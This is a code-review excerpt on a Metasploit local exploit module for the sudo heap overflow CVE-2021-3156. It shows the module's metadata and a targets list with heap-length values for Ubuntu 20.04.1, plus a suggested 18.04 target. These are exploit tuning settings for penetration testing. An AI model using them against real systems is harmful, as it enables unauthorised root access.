modules/exploits/linux/local/cve_2021_3156_sudo.rb

```diff
@@ -0,0 +1,158 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Post::File
+  include Msf::Post::Unix
+  include Msf::Post::Linux::System
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'           => 'Heap-Based Buffer Overflow in Sudo',
+        'Description'    => %q(
+          A heap based buffer overflow exists in the sudo command line utility that can be exploited by a local attacker
+          to gain elevated privileges. The vulnerability was interested in July of 2011 and affects version 1.8.2
+          through 1.8.31p2 as well as 1.9.0 through 1.9.5p1 in their default configurations. The technique used by this
+          implementation leverages the overflow to overwrite a service_user struct in memory to reference an attacker
+          controlled library which results in it being loaded with the elevated privileges held by sudo.
+        ),
+        'License'        => MSF_LICENSE,
+        'Author'         =>
+          [
+            'Qualys',                            # vulnerability discovery and analysis
+            'Spencer McIntyre',                  # metasploit module
+            'bwatters-r7',                       # metasploit module
+            'blasty <blasty@fail0verflow.com>',  # original PoC
+            'Alexander Krog'                     # detailed vulnerability analysis and exploit technique
+          ],
+        'SessionTypes'   => ['shell', 'meterpreter'],
+        'Platform'       => ['unix', 'linux'],
+        'References'     => [
+          ['URL', 'https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit'],
+          ['URL', 'https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt'],
+          ['URL', 'https://www.kalmarunionen.dk/writeups/sudo/'],
+          ['URL', 'https://github.com/blasty/CVE-2021-3156/blob/main/hax.c'],
+          ['CVE', '2021-3156'],
+        ],
+        'Targets'        =>
+          [
+            [ 'Manual', { } ],
+            [ 'Ubuntu 20.04.1 x64 (sudo v1.8.31, libc v2.31)', { lengths: [ 56, 54, 63, 200 ] } ],
+          ],
```

Comment:
```suggestion
[ 'Ubuntu 18.04.1 x64 (sudo v1.8.21p2, libc v2.27)', { lengths: [ 56, 54, 63, 212 ] } ],
],
```

Reply:
These values should work for 18.04.1 - 18.04.5. It's (probably?) not worth adding separate targets for each revision when the values are the same.